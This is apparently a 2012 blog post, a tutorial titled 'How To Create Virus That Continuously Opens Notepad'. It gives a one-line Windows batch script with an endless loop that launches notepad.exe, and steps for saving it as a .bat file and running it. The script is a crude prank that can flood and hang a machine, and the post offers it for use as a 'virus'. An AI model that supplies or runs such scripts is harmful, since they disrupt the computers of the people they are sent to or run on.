Sunday, 14 October 2012

How To Create Virus That Continuosly Opens Notepad


How To Create Virus That Continuously Opens Notepad

1. Click on Start-> Run -> Notepad.
2. In Notepad Paste the following code.
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO top

3. Now Save the file with an extensiom .bat , for example: notepad.bat
4. If you click on notepad .bat , notepad will be opening continuously.

No comments:

Post a Comment